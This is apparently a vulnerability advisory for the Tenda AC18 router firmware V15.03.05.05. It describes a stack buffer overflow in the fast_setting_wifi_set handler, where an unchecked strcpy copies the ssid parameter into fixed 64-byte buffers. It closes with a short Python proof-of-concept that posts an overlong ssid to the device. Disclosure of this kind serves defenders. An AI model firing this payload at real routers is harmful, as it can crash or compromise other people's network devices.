-
The device's official website: https://www.tenda.com.cn/product/overview/AC18.html
-
Firmware download website: https://www.tenda.com.cn/download/detail-2610.html
V15.03.05.05
The Tenda AC18 V15.03.05.05 firmware has a stack overflow vulnerability in the form_fast_setting_wifi_set
function. The src
variable receives the ssid
parameter from a POST request and is later assigned to the s
and dest
variable, which is fixed at 64 bytes. However, since the user can control the input of ssid
, the statement strcpy(dest, s);
and strcpy(dest, src);
can cause a buffer overflow. The user-provided ssid
can exceed the capacity of the s
and dest
array, triggering this security vulnerability.
import requests
ip = '192.168.84.101'
url = f'http://{ip}/goform/fast_setting_wifi_set'
payload = {
'ssid': 'a' * 1000
}
r = requests.post(url=url, data=payload)
print(r.content)